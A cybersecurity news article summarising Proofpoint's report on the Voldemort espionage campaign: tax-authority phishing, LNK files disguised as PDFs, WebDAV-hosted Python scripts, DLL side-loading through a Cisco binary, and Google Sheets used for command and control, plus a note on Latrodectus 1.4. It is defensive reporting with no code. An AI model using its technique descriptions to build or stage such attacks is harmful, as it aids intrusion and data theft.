Researchers studying cybersecurity have discovered a brand-new malware operation that uses Google Sheets as a command-and-control (C2) tool.
Beginning on August 5, 2024, Proofpoint began to detect the activity, which involves posing as tax authorities from governments in Europe, Asia, and the United States with the intention of targeting over 70 organizations globally using a custom tool called Voldemort, which is capable of gathering data and delivering more payloads.
The industries that are being targeted include insurance, government, media, manufacturing, telecom, insurance, aerospace, transportation, academia, finance, technology, industrial, healthcare, automobile, hospitality, and energy.
No single known threat actor has been linked to the alleged cyber espionage activity. The attacks have involved the sending of up to 20,000 emails.
These emails warn recipients about changes to their tax files and encourage them to click on Google AMP Cache URLs that take visitors to an intermediate landing page. The emails purport to be from tax authorities in the United States, the United Kingdom, France, Germany, Italy, India, and Japan.
The page looks at the User-Agent string to see if the user is running Windows. If so, it uses the search-ms: URI protocol handler to show a Windows shortcut (LNK) file that tries to trick the victim into opening it by posing as a PDF file and using Adobe Acrobat Reader.
Proofpoint researchers Tommy Madjar, Pim Trouerbach, and Selena Larson explained that if the LNK is executed, “it will invoke PowerShell to run Python.exe from a third WebDAV share on the same tunnel (\library\), passing a Python script on a fourth share (\resource\) on the same host as an argument.”
“This causes Python to run the script without downloading any files to the computer, with dependencies being loaded directly from the WebDAV share.”
The purpose of the Python script is to collect system data, transfer it to an actor-controlled domain in the form of a Base64-encoded string, display a fake PDF to the user, and download a password-protected ZIP file from OpenDrive.
Regarding the ZIP archive, it holds two files: a malicious DLL called CiscoSparkLauncher.dll (also known as Voldemort) that is sideloaded and a genuine program called CiscoCollabHost.exe that is vulnerable to DLL side-loading.
Voldemort is a specially designed backdoor built in C with the ability to collect data and load subsequent payloads. The malware uses Google Sheets for C2 and data exfiltration, and it can also carry out commands from the operators.
The behavior, according to Proofpoint, is associated with advanced persistent threats (APT) but has “cybercrime vibes” since it employs methods that are common in the world of online crime.
“Threat actors utilize external file sharing resources, particularly WebDAV and Server Message Block (SMB), by abusing file schema URIs to stage malware. The researchers explained that this is accomplished by linking to a remote server that is hosting the malicious content using the schema ‘file://’.
Malware families like Latrodectus, DarkGate, and XWorm that serve as initial access brokers (IABs) have begun using this strategy more frequently.
In addition, Proofpoint claimed to have reviewed the Google Sheet and identify a total of six victims, one of whom is thought to be a “known researcher” or a sandbox.
The fact that the campaign has been labeled as unique raises the potential that the threat actors first targeted a large number of people before focusing on a select few. It’s also plausible that the attackers intended to infect multiple businesses, probably with differing degrees of technical proficiency.
“While many of the campaign characteristics align with cybercriminal threat activity, we assess this is likely espionage activity conducted to support as yet unknown final objectives,” the investigators stated.
“The Frankensteinian amalgamation of clever and sophisticated capabilities, paired with very basic techniques and functionality, makes it difficult to assess the level of the threat actor’s capability and determine with high confidence the ultimate goals of the campaign.”
The development coincides with the discovery by Netskope Threat Labs of an updated Latrodectus malware version (1.4) that includes two new backdoor instructions and a new C2 endpoint. These commands enable the virus to download shellcode from a designated server and retrieve arbitrary files from a remote location.
According to security researcher Leandro Fróes, “Latrodectus has been evolving pretty fast, adding new features to its payload.” “The understanding of the updates applied to its payload allows defenders to keep automated pipelines properly set as well as use the information for further hunting for new variants.”
